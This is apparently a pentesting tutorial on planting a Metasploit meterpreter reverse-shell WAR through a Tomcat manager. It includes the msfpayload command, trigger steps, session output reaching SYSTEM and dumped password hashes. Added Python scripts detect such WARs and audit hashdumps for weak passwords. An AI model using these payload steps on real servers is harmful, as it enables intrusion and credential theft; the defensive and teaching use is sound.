So, you’ve just brute-forced the admin password for the Tomcat web application manager and you want to take it a step further… step in Metasploit.

msfpayload can create a WAR file containing a payload, which you then upload to the target through the manager to exploit the box.

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W > /root/MetRev.war

Log into the interface at http://192.168.1.112:8080/manager/html and upload the payload.

Once uploaded, you then need to request the JSP file; its (randomly generated) name can be found by listing the contents of the WAR with unzip:

root@bt:~# unzip -l MetRev.war
Archive:  MetRev.war
  Length      Date    Time    Name
---------  ---------- -----   ----
       71  2011-05-22 19:06   META-INF/MANIFEST.MF
        0  2011-05-22 19:06   WEB-INF/
      267  2011-05-22 19:06   WEB-INF/web.xml
     1578  2011-05-22 19:06   nqaxmatvd.jsp
   147604  2011-05-22 19:06   jVfQFWuAPAToYS.txt
---------                     -------
   149520                     5 files
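That listing is also what a defender sees when pulling a suspicious WAR out of the manager's upload directory or a proxy capture: a JSP with a generated name sitting at the archive root, and a large, high-entropy file with a non-web extension carrying the stage. The script below is an added example, not code from the original post or from Metasploit; it builds a constructed in-memory WAR that mirrors the listing above (the file names are taken from the listing, the contents are filler) and flags those two traits. The name heuristic and the 64 KB / 7.0 bits-per-byte thresholds are assumptions you would tune to your own deployments.

```python
import io
import math
import posixpath
import zipfile
from collections import Counter

VOWELS = set("aeiouAEIOU")
# Extensions you expect in a web application archive; anything else that is
# large and high-entropy is worth a second look.
WEB_EXTS = {".jsp", ".html", ".htm", ".css", ".js", ".xml", ".mf", ".class",
            ".jar", ".properties", ".png", ".jpg", ".gif", ".tld"}


def build_sample_war() -> bytes:
    """Constructed WAR mirroring the unzip listing on the page: manifest, web.xml,
    a generated-looking JSP at the archive root and a large non-web '.txt' file.
    Names match the listing; contents are filler so the example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr("nqaxmatvd.jsp", "<%@ page import=\"java.io.*\" %>" + "x" * 1500)
        zf.writestr("jVfQFWuAPAToYS.txt", bytes(range(256)) * 577)  # ~147 KB, entropy 8.0
    return buf.getvalue()


def looks_random(stem: str) -> bool:
    """Crude heuristic for generated names (an assumption, not a Metasploit rule):
    at least 8 letters and either vowel-poor or mixed-case with no separators,
    e.g. 'nqaxmatvd' or 'jVfQFWuAPAToYS'."""
    if len(stem) < 8 or not stem.isalpha():
        return False
    vowel_ratio = sum(c in VOWELS for c in stem) / len(stem)
    mixed_case = stem != stem.lower() and stem != stem.upper()
    return vowel_ratio < 0.25 or mixed_case


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 means uniformly distributed (packed, encrypted or random)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def inspect_war(data: bytes, size_threshold: int = 64 * 1024) -> list[str]:
    """Return human-readable findings for a WAR held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            directory, filename = posixpath.split(info.filename)
            stem, ext = posixpath.splitext(filename)
            ext = ext.lower()
            # Trait 1: a JSP at the archive root whose name looks generated.
            if ext == ".jsp" and directory == "" and looks_random(stem):
                findings.append(f"root-level JSP with generated-looking name: {info.filename}")
            # Trait 2: a large, high-entropy file that is not a normal web asset.
            if ext not in WEB_EXTS and info.file_size > size_threshold:
                entropy = shannon_entropy(zf.read(info))
                if entropy > 7.0:
                    findings.append(
                        f"large high-entropy non-web file ({info.file_size} bytes, "
                        f"{entropy:.2f} bits/byte): {info.filename}")
    return findings


if __name__ == "__main__":
    for finding in inspect_war(build_sample_war()):
        print(finding)
```

Run against a real archive with `inspect_war(open("suspect.war", "rb").read())`; a legitimate application will usually trip neither check, whereas a generated dropper trips both.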

Start the meterpreter reverse_tcp handler, request http://192.168.1.112:8080/MetRev/nqaxmatvd.jsp, and before you know it… ROOT!!!!

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.109:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.1.112
[*] Meterpreter session 1 opened (192.168.1.109:4444 -> 192.168.1.112:1084) at 2011-05-22 19:09:26 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:0849fe34e1da4ff869da83eb443e12e3:::
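Two things in that hashdump output matter more than the shell itself: Tomcat was running as NT AUTHORITY\SYSTEM, so a web-app upload became a full machine compromise, and the Administrator account still has an LM hash stored (the first hash is not the empty-LM value `aad3b435b51404eeaad3b435b51404ee`), which means LM hash storage was never disabled and the password is 14 characters or fewer. The script below is an added example, not part of the original post, that audits pwdump-format lines for exactly those weaknesses; the first three sample lines are the page's hashdump output, the fourth (`svc_backup`) is a constructed account added to show the reuse check.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM value stored when LM hashing is off or password > 14 chars
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::")

# Lines 1-3 are the page's hashdump output; line 4 is a constructed account that
# reuses the Administrator NT hash (i.e. the same password).
SAMPLE = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:0849fe34e1da4ff869da83eb443e12e3:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""


def parse_pwdump(line: str):
    """Return a dict for one pwdump line, or None if it does not parse."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["rid"] = int(rec["rid"])
    rec["lm"] = rec["lm"].lower()
    rec["nt"] = rec["nt"].lower()
    return rec


def audit(lines) -> dict:
    """Map each account with a weakness to the list of weaknesses found:
    LM hash stored, empty password, or NT hash shared with another account."""
    records = [r for r in map(parse_pwdump, lines) if r]
    nt_owners = defaultdict(list)
    for r in records:
        nt_owners[r["nt"]].append(r["user"])

    issues = {}
    for r in records:
        found = []
        if r["lm"] != EMPTY_LM:
            found.append("LM hash stored (LM storage enabled, password of 14 chars or fewer)")
        if r["nt"] == EMPTY_NT:
            found.append("empty password")
        elif len(nt_owners[r["nt"]]) > 1:
            others = [u for u in nt_owners[r["nt"]] if u != r["user"]]
            found.append("NT hash shared with: " + ", ".join(others))
        if found:
            issues[r["user"]] = found
    return issues


if __name__ == "__main__":
    for user, found in audit(SAMPLE.splitlines()).items():
        print(f"{user}: {'; '.join(found)}")
```

Run it over a hashdump from an authorised assessment and the output is the remediation list: disable LM hash storage (the `NoLMHash` policy) and rotate the affected passwords, disable or set a password on accounts with the empty NT hash, and break up any shared passwords. None of this requires cracking a single hash.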
